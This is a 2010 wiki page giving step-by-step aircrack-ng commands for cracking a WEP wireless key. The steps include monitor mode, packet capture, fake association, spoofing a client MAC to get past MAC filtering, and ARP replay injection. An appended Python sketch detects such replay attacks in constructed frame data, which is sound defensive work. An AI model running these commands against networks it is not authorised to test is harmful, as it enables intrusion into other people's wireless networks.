Difference between revisions of "Cracking A WEP Key"
Line 1: | Line 1: | ||
+ | See http://www.aircrack-ng.org/doku.php?id=tutorial | ||
+ | |||
*Install kismet, kismet-plugins and aircrack-ng packages | *Install kismet, kismet-plugins and aircrack-ng packages | ||
*Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked | *Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked |
Revision as of 15:58, 14 December 2010
See http://www.aircrack-ng.org/doku.php?id=tutorial
- Install kismet, kismet-plugins and aircrack-ng packages
- Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked
These tools are fussy about hex addresses: include leading zeros and don't use lower-case hex digits.
- Become root:
su -
- Put NIC into monitor mode:
airmon-ng start wlan0
- Start capturing packets:
airodump-ng -w dumpfile --channel <channel> mon0
If you don't get enough traffic from the access point on that channel, start a new terminal session:
- Associate with the target AP
aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0
If that doesn't associate successfully, it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h.
- Start replaying packets so that we can collect more packets:
aireplay-ng -3 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0
Watch the Data column in the airodump-ng session; we want more than 100,000 unique IV headers.
- Ctrl-C the dump process and crack the key:
aircrack-ng dumpfile.ivs
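Seen from the monitoring side, the replay step in this procedure stands out: a sender normally uses a fresh IV for each WEP frame, while a replaying station sends the same frame (same IV, same length) over and over. The following detection sketch is an added example, not part of the original wiki page; the record layout, threshold, and window are assumptions, and the sample frames are constructed.

```python
from collections import defaultdict

# Assumed record layout (not any real tool's output): one tuple per WEP data frame
# seen by a sensor: (timestamp_s, source_mac, bssid, iv_hex, frame_length).
REPLAY_THRESHOLD = 50   # assumed; well above what 802.11 retries of one frame produce
WINDOW_S = 10.0         # assumed sliding window, in seconds

def normalize_mac(mac):
    """Return the upper-case, zero-padded, colon-separated form of a MAC address."""
    parts = mac.replace("-", ":").split(":")
    if len(parts) != 6:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(f"{int(p, 16):02X}" for p in parts)

def find_replay_sources(frames):
    """Map (source, bssid) to the peak count of identical (IV, length) frames per window."""
    by_key = defaultdict(list)
    for ts, src, bssid, iv, length in frames:
        key = (normalize_mac(src), normalize_mac(bssid), iv.upper(), length)
        by_key[key].append(ts)
    alerts = {}
    for (src, bssid, _iv, _length), times in by_key.items():
        times.sort()
        start = best = 0
        for end, t in enumerate(times):
            while t - times[start] > WINDOW_S:   # shrink window from the left
                start += 1
            best = max(best, end - start + 1)
        if best >= REPLAY_THRESHOLD:
            alerts[(src, bssid)] = max(best, alerts.get((src, bssid), 0))
    return alerts

def build_sample():
    """Constructed sample: one ordinary client plus one station replaying a single frame."""
    ap = "00:1a:2b:3c:4d:5e"                     # constructed BSSID
    frames = [(i * 0.05, "00:11:22:33:44:55", ap, f"{i:06x}", 60 + i % 40)
              for i in range(200)]               # fresh IV on every frame
    frames += [(i * 0.01, "0:1:2:3:4:5", ap, "a1b2c3", 68)
               for i in range(300)]              # same IV and length 300 times
    return frames

if __name__ == "__main__":
    for (src, bssid), count in find_replay_sources(build_sample()).items():
        print(f"possible replay: {src} -> {bssid}, {count} identical frames in {WINDOW_S}s")
```
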